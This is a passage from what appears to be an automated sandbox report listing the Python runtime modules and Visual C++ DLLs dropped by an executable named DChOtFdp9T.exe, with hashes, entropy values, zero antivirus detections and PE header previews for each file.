                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                          Entropy (8bit):4.675380950473425
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
                                                                                                                                                                                                                          MD5:44B930B89CE905DB4716A548C3DB8DEE
                                                                                                                                                                                                                          SHA1:948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
                                                                                                                                                                                                                          SHA-256:921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
                                                                                                                                                                                                                          SHA-512:79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_strxor.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                          Entropy (8bit):4.625428549874022
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
                                                                                                                                                                                                                          MD5:F24F9356A6BDD29B9EF67509A8BC3A96
                                                                                                                                                                                                                          SHA1:A26946E938304B4E993872C6721EB8CC1DCBE43B
                                                                                                                                                                                                                          SHA-256:034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
                                                                                                                                                                                                                          SHA-512:C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):120400
                                                                                                                                                                                                                          Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                          MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                          SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                          SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                          SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\VCRUNTIME140_1.dll

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):49744
                                                                                                                                                                                                                          Entropy (8bit):6.701724666218339
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                                          MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                                          SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                                          SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                                          SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_asyncio.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):71448
                                                                                                                                                                                                                          Entropy (8bit):6.274367479203647
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:zF44laLwm4HS8NywUlz4dIvOnW7Sy85x4:zO4eBCxNywWEdIvOnWaA
                                                                                                                                                                                                                          MD5:E74E8B37BD359F581F368BA092EED90E
                                                                                                                                                                                                                          SHA1:E6BDC3494DBC5D4AE0434BF4DC3B2952E4827F18
                                                                                                                                                                                                                          SHA-256:184FC13677C7856E7A8B31DFE79CE68DCEA10CDF83A205DE2B0D5497FB0FFDF3
                                                                                                                                                                                                                          SHA-512:29D33593758945A02844E1333ED99D66A0E42EB7E8D0C881197F05D4EC9DAD3F1BB490739BC2D64EA9451F4BBBFCC05089A57A7AA1EC22C4091C7EDD604B7F7C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...........%.....................................................K...................I...........Rich...................PE..d....g.f.........." ...).f................................................... ......HM....`.............................................P......d......................../..............T...........................P...@...............(............................text....e.......f.................. ..`.rdata...O.......P...j..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_bz2.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):84760
                                                                                                                                                                                                                          Entropy (8bit):6.5949173382940405
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:ZWNz7JrA+VLsS53XtGHagwIF27YuLw8emTayR12FIvCVv7Sy+xJ:0Nzdb53XfoxKrbTBkFIvCVv4
                                                                                                                                                                                                                          MD5:FE499B0A9F7F361FA705E7C81E1011FA
                                                                                                                                                                                                                          SHA1:CC1C98754C6DAB53F5831B05B4DF6635AD3F856D
                                                                                                                                                                                                                          SHA-256:160B5218C2035CCCBAAB9DC4CA26D099F433DCB86DBBD96425C933DC796090DF
                                                                                                                                                                                                                          SHA-512:60520C5EB5CCC72AE2A4C0F06C8447D9E9922C5F9F1F195757362FC47651ADCC1CDBFEF193AE4FEC7D7C1A47CF1D9756BD820BE996AE145F0FBBBFBA327C5742
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!...!...!...(.o.+...1I..#...1I.."...1I..%...1I..)...1I..,...iH.."...j...#...!...~...iH..)...iH.. ...iH.. ...iH.. ...Rich!...........PE..d....g.f.........." ...).....^......`........................................P............`.........................................0...H...x........0....... ..,......../...@..........T...........................p...@............................................text............................... ..`.rdata...>.......@..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_cffi_backend.cp312-win_amd64.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):182784
                                                                                                                                                                                                                          Entropy (8bit):6.193615170968096
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:YRAMUp3K6YoDssyudy4VcRG+nR3hnW3mjwwOdkS9S7iSSTLkK/jftw3buz:Y6MyK65ssy+MG+LnSUwjD9zSSTLL/jl8
                                                                                                                                                                                                                          MD5:0572B13646141D0B1A5718E35549577C
                                                                                                                                                                                                                          SHA1:EEB40363C1F456C1C612D3C7E4923210EAE4CDF7
                                                                                                                                                                                                                          SHA-256:D8A76D1E31BBD62A482DEA9115FC1A109CB39AF4CF6D1323409175F3C93113A7
                                                                                                                                                                                                                          SHA-512:67C28432CA8B389ACC26E47EB8C4977FDDD4AF9214819F89DF07FECBC8ED750D5F35807A1B195508DD1D77E2A7A9D7265049DCFBFE7665A7FD1BA45DA1E4E842
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.C.I.C.I.C.1MC.I.C.<.B.I.C.&#C.I.C.<.B.I.C.<.B.I.C.<.B.I.C.1.B.I.C.4.B.I.C.I.C I.C.<.B.I.C.1KC.I.C.<.B.I.C.<!C.I.C.<.B.I.CRich.I.C................PE..d...g..e.........." .........@......`........................................@............`..........................................w..l....w....... ..........l............0.......]...............................]..8............................................text............................... ..`.rdata..............................@..@.data...h].......0...|..............@....pdata..l...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_ctypes.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):125208
                                                                                                                                                                                                                          Entropy (8bit):6.136121476280913
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:4LIBXrBDuYifTbergyzjsckxf/EfCODh1NlL5IvLPJjL:XBbBDuBf2HfUxf/EfBDn0
                                                                                                                                                                                                                          MD5:302DDF5F83B5887AB9C4B8CC4E40B7A6
                                                                                                                                                                                                                          SHA1:0AA06AF65D072EB835C8D714D0F0733DC2F47E20
                                                                                                                                                                                                                          SHA-256:8250B4C102ABD1DBA49FC5B52030CAA93CA34E00B86CEE6547CC0A7F22326807
                                                                                                                                                                                                                          SHA-512:5DDC2488FA192D8B662771C698A63FAAF109862C8A4DD0DF10FB113AEF839D012DF58346A87178AFF9A1B369F82D8AE7819CEF4AAD542D8BD3F91327FEACE596
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f~.............................................................................){.............................................Rich............PE..d....g.f.........." ...)............P_....................................................`.........................................``.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..zl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_decimal.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):256792
                                                                                                                                                                                                                          Entropy (8bit):6.572286948518575
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:hJ1fsF1yTr4Q6Vll9INhWyZHV89Ilxe99qWM53pLW1AdZZZEgtLMwDrijc:VvUVlEhBX2YcQaAnDOY
                                                                                                                                                                                                                          MD5:82321FB8245333842E1C31F874329170
                                                                                                                                                                                                                          SHA1:81ABB1D3D5C55DB53E8ACA9BDF74F2DEC0ABA1A3
                                                                                                                                                                                                                          SHA-256:B7F9603F98EF232A2C5BCE7001D842C01D76ED35171AFBD898E6D17FACF38B56
                                                                                                                                                                                                                          SHA-512:0CF932EE0D1242EA9377D054ADCD71FDD7EC335ABBAC865E82987E3979E24CEAD6939CCA19DA63A08E08AC64FACE16950EDCE7918E02BFC7710F09645FD2FA19
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J6U.+X..+X..+X..S...+X..Y..+X..[..+X..\..+X..]..+X...Y..+X..SY..+X..+Y.E+X...[..+X...U..+X...X..+X......+X...Z..+X.Rich.+X.................PE..d....g.f.........." ...).....:............................................................`.........................................@c..P....c..................d&......./......T.......T...............................@............................................text............................... ..`.rdata..............................@..@.data...X*.......$...`..............@....pdata..d&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_hashlib.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):66328
                                                                                                                                                                                                                          Entropy (8bit):6.229205873282761
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:mHhSlKxOZdShtmgHbGmZOEoSK3Ic0V3QBdIvOI25YiSyv/AMxkEU:CxO3I17DZRoh3Ic43WdIvOIM7Sy3xg
                                                                                                                                                                                                                          MD5:0ABFEE1DB6C16E8DDAFF12CD3E86475B
                                                                                                                                                                                                                          SHA1:B2DDA9635EDE4F2841912CC50CB3AE67EEA89FE7
                                                                                                                                                                                                                          SHA-256:B4CEC162B985D34AB768F66E8FA41ED28DC2F273FDE6670EEACE1D695789B137
                                                                                                                                                                                                                          SHA-512:0A5CAE4E3442AF1D62B65E8BF91E0F2A61563C2B971BBF008BFB2DE0F038EE472E7BFCC88663DC503B2712E92E6A7E6A5F518DDAB1FAB2EB435D387B740D2D44
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........WH@.6&..6&..6&..N...6&...'..6&...%..6&..."..6&...#..6&...'..6&..N'..6&...'..6&..6'.16&...+..6&...&..6&......6&...$..6&.Rich.6&.........................PE..d....g.f.........." ...).V..........0@....................................................`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_lzma.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):158488
                                                                                                                                                                                                                          Entropy (8bit):6.857717041623552
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:kf7P77jrFDn7NjQDRX17znfV9mNoHnIjN1VbHNiFIvZ1AB:kf7j9OD9YOH+bHNiJ
                                                                                                                                                                                                                          MD5:E3E7E99B3C2EA56065740B69F1A0BC12
                                                                                                                                                                                                                          SHA1:79FA083D6E75A18E8B1E81F612ACB92D35BB2AEA
                                                                                                                                                                                                                          SHA-256:B095FA2EAC97496B515031FBEA5737988B18DEEE86A11F2784F5A551732DDC0C
                                                                                                                                                                                                                          SHA-512:35CBC30B1CCDC4F5CC9560FC0149373CCD9399EB9297E61D52E6662BB8C56C6A7569D8CFAD85AEB057C10558C9352AE086C0467F684FDCF72A137EADF563A909
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,..:,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..V,.V.,..-.V.,Rich.V.,........PE..d....g.f.........." ...).`..........`2..............................................HP....`.............................................L...<...x....`.......@.......<.../...p..4....|..T............................{..@............p...............................text...f_.......`.................. ..`.rdata.......p.......d..............@..@.data...p....0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..4....p.......:..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_multiprocessing.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):35608
                                                                                                                                                                                                                          Entropy (8bit):6.431265882453482
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:CI9pp7OBajKCD2yil0uduNIvWtR5YiSyv/7AMxkEsR:CoptOBaJDil0uINIvWtf7SyLxC
                                                                                                                                                                                                                          MD5:4DAA82AAFC49DD75DAEA468CC37EF4B0
                                                                                                                                                                                                                          SHA1:CBF05ABC0EB9A6529AA01955D5FEAC200E602C89
                                                                                                                                                                                                                          SHA-256:A197F3485BBE30B3A1612EA2198CEF121AF440BA799FD6CBF0AD3493150DF3CA
                                                                                                                                                                                                                          SHA-512:473CAA70EC832B645296EBA3DA2DC0BBFC90DF15281A9DE612A2FEBF10B7E86D7F20F1C265C7BE693BC0D25E11D3D2904F4C2B1039A81AE0E192CFCA625408D5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.W)v.9zv.9zv.9z..zt.9zf,8{t.9zf,:{u.9zf,={~.9zf,<{{.9z>-8{t.9zv.8z..9z=.8{s.9z>-4{t.9z>-9{w.9z>-.zw.9z>-;{w.9zRichv.9z................PE..d....g.f.........." ...). ...>......@...............................................&.....`.........................................@E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata... ...0..."...$..............@..@.data...`....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_overlapped.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):56088
                                                                                                                                                                                                                          Entropy (8bit):6.331887829832768
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:+5i+rYIgKZPXZCJ/+SdwDDrxIvXtF7SySxP4:+50J/+SdwDDrxIvXtFy4
                                                                                                                                                                                                                          MD5:B89FCA6EDBA418768147E455085F7CC7
                                                                                                                                                                                                                          SHA1:5D41E0990E19EE0D131B4FE8C6AC5B7371D1F83E
                                                                                                                                                                                                                          SHA-256:2AF91C5AB6F05C4BE357B93673920ECCF3EBCAD5E5EC6B0A7B53EF94A5FEAAD7
                                                                                                                                                                                                                          SHA-512:A6BD8D62FB1FBEBBFA9FEE9037EFFBCBBB48BFA2E6C8B398E036C0BD5F402A4B1C0BF0AD8D80585FE501E00D7FE21B387A0F0E05AD2FCDF3AEB248010CB3F1BE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.{X/.(X/.(X/.(QW_(\/.(H..)Z/.(H..)[/.(H..)P/.(H..)T/.(...)Z/.(X/.(//.(.W.)]/.(.W.)Y/.(...)Y/.(...)Y/.(..3(Y/.(...)Y/.(RichX/.(........................PE..d....g.f.........." ...).N...`.......................................................8....`.............................................X.............................../......(....f..T............................e..@............`...............................text...7L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...0...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_queue.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32536
                                                                                                                                                                                                                          Entropy (8bit):6.553393437193411
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:g1zRmezk6rGq17W45IvQUcV5YiSyvRfAMxkE4:QRm0lGY7W45IvQUc77SyhxM
                                                                                                                                                                                                                          MD5:941A3757931719DD40898D88D04690CB
                                                                                                                                                                                                                          SHA1:177EDE06A3669389512BFC8A9B282D918257BF8B
                                                                                                                                                                                                                          SHA-256:BBE7736CAED8C17C97E2B156F686521A788C25F2004AAE34AB0C282C24D57DA7
                                                                                                                                                                                                                          SHA-512:7CFBA5C69695C492BF967018B3827073B0C2797B24E1BD43B814FBBB39D1A8B32A2D7EF240E86046E4E07AA06F7266A31B5512D04D98A0D2D3736630C044546E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\...........%.........................................................................I...........Rich...................PE..d....g.f.........." ...).....8............................................................`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_socket.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):83736
                                                                                                                                                                                                                          Entropy (8bit):6.318116609837273
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:3OYxHEUZql2HLSyypHb9/s+S+pzG8iFWmIHJqKN5IvLw767SyZxqND:+dUZqzyypHb9/sT+pzG8CxIpdN5IvLwD
                                                                                                                                                                                                                          MD5:632336EEEAD53CFAD22EB57F795D5657
                                                                                                                                                                                                                          SHA1:62F5F73D21B86CD3B73B68E5FAEC032618196745
                                                                                                                                                                                                                          SHA-256:CE3090FFF8575B21287DF5FC69AE98806646FC302EEFADF85E369AD3DEBAD92B
                                                                                                                                                                                                                          SHA-512:77965B45060545E210CDB044F25E5FD68D6A9150CAF1CAD7645DBAFCF1CE8E1CCBDF8436FBDCBF5F9C293321C8916E114DE30ED8897C7DB72DF7F8D1F98DFB55
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,...Ml}.Ml}.Ml}.5.}.Ml}..m|.Ml}..o|.Ml}..h|.Ml}..i|.Ml}..m|.Ml}.Mm}.Ml}.5m|.Ml}..a|.Ml}..l|.Ml}..}.Ml}..n|.Ml}Rich.Ml}................PE..d....g.f.........." ...).x..........0-.......................................`......75....`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\_ssl.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):177944
                                                                                                                                                                                                                          Entropy (8bit):5.9708659528965855
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:V1l+KugCpMRjN/ft6X6k7GxOnvvkKuFBZd4rYcvsswCfyX0NoFFIvC75/:V1QKugCpAJHt6X6nKvv9gF5
                                                                                                                                                                                                                          MD5:EEA3E12970E28545A964A95DA7E84E0B
                                                                                                                                                                                                                          SHA1:C3CCAC86975F2704DABC1FFC3918E81FEB3B9AC1
                                                                                                                                                                                                                          SHA-256:61F00B0543464BBA61E0BD1128118326C9BD0CDC592854DD1A31C3D6D8DF2B83
                                                                                                                                                                                                                          SHA-512:9BD5C83E7E0AB24D6BE40A31AC469A0D9B4621A2A279A5F3AB2FC6401A08C54AEC421BC9461AED533A0211D7DBDA0C264C5F05AEB39138403DA25C8CDA0339E6
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
